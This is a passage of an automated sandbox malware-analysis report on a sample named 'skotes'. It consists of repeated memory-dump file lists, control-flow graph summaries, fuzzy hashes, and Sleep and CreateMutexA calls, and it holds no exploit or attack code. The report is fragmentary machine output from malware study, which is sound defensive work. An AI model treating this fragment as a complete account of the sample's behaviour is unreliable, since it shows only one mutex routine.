                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 8c62f5dadcc28011897ebf060cb61445a609ccfae9c974c1b3b4072d693b2322
                                                                                                                                                                                                                                              • Instruction ID: 8fa7124de690d7432832bf7d4c3b403388bee21f86a2cca581c9184db0fc395d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c62f5dadcc28011897ebf060cb61445a609ccfae9c974c1b3b4072d693b2322
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72312A316001448BFB08DF78DCC9B6DF7E6EBC5318F24429AE414977E6E77A99808716

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 202 bda682-bda6a2 206 bda6a4-bda6b0 202->206 207 bda6d0-bda6ec 202->207 208 bda6c6-bda6cd call bed663 206->208 209 bda6b2-bda6c0 206->209 210 bda6ee-bda6fa 207->210 211 bda71a-bda739 207->211 208->207 209->208 212 bda949 209->212 214 bda6fc-bda70a 210->214 215 bda710-bda717 call bed663 210->215 216 bda73b-bda747 211->216 217 bda767-bda916 call be80c0 211->217 220 bda94e 212->220 221 bda949 call c06c6a 212->221 214->212 214->215 215->211 218 bda75d-bda764 call bed663 216->218 219 bda749-bda757 216->219 218->217 219->212 219->218 228 bda953-bda994 Sleep CreateMutexA 220->228 229 bda94e call c06c6a 220->229 221->220 234 bda9a7-bda9a8 228->234 235 bda996-bda998 228->235 229->228 235->234 236 bda99a-bda9a5 235->236 236->234
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 08362be70e0f30f103e8a478e25d7e11b7c18c498bf4a1334b7abe8b905a31e2
                                                                                                                                                                                                                                              • Instruction ID: cbde2121a9cc148115579c6317f64fcb2ab9c035372a56e13aad8db2a9ca20e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08362be70e0f30f103e8a478e25d7e11b7c18c498bf4a1334b7abe8b905a31e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D3148316001448BFB08DB78DDC9B6DF7F2DBC5314F24829AE014977E2E7BA99808756

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 238 bd9adc-bd9ae8 239 bd9afe-bd9b27 call bed663 238->239 240 bd9aea-bd9af8 238->240 247 bd9b29-bd9b35 239->247 248 bd9b55-bd9b57 239->248 240->239 241 bda917 240->241 243 bda953-bda994 Sleep CreateMutexA 241->243 244 bda917 call c06c6a 241->244 254 bda9a7-bda9a8 243->254 255 bda996-bda998 243->255 244->243 250 bd9b4b-bd9b52 call bed663 247->250 251 bd9b37-bd9b45 247->251 252 bd9b59-bda916 call be80c0 248->252 253 bd9b65-bd9d91 call be7a00 call bd5c10 call bd8b30 call be8220 call be7a00 call bd5c10 call bd8b30 call be8220 248->253 250->248 251->241 251->250 255->254 256 bda99a-bda9a5 255->256 256->254
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: da5a1b3be847ed09bded5bd7289915c3b849e1ab1f586f2ba0df8c33ef24ae0c
                                                                                                                                                                                                                                              • Instruction ID: 218c9241c53821e0aeee0c2df403385003ad3daf5ff71a5ae254a6f03a593de0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da5a1b3be847ed09bded5bd7289915c3b849e1ab1f586f2ba0df8c33ef24ae0c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E213A316042449BFB189B68ECC972DF7A1EBC1314F20426AF414977E5E77A99808711

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 315 bda856-bda86e 316 bda89c-bda89e 315->316 317 bda870-bda87c 315->317 320 bda8a9-bda8b1 call bd7d30 316->320 321 bda8a0-bda8a7 316->321 318 bda87e-bda88c 317->318 319 bda892-bda899 call bed663 317->319 318->319 322 bda94e 318->322 319->316 332 bda8e4-bda8e6 320->332 333 bda8b3-bda8bb call bd7d30 320->333 324 bda8eb-bda916 call be80c0 321->324 329 bda953-bda987 Sleep CreateMutexA 322->329 330 bda94e call c06c6a 322->330 335 bda98e-bda994 329->335 330->329 332->324 333->332 340 bda8bd-bda8c5 call bd7d30 333->340 337 bda9a7-bda9a8 335->337 338 bda996-bda998 335->338 338->337 339 bda99a-bda9a5 338->339 339->337 340->332 344 bda8c7-bda8cf call bd7d30 340->344 344->332 347 bda8d1-bda8d9 call bd7d30 344->347 347->332 350 bda8db-bda8e2 347->350 350->324
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
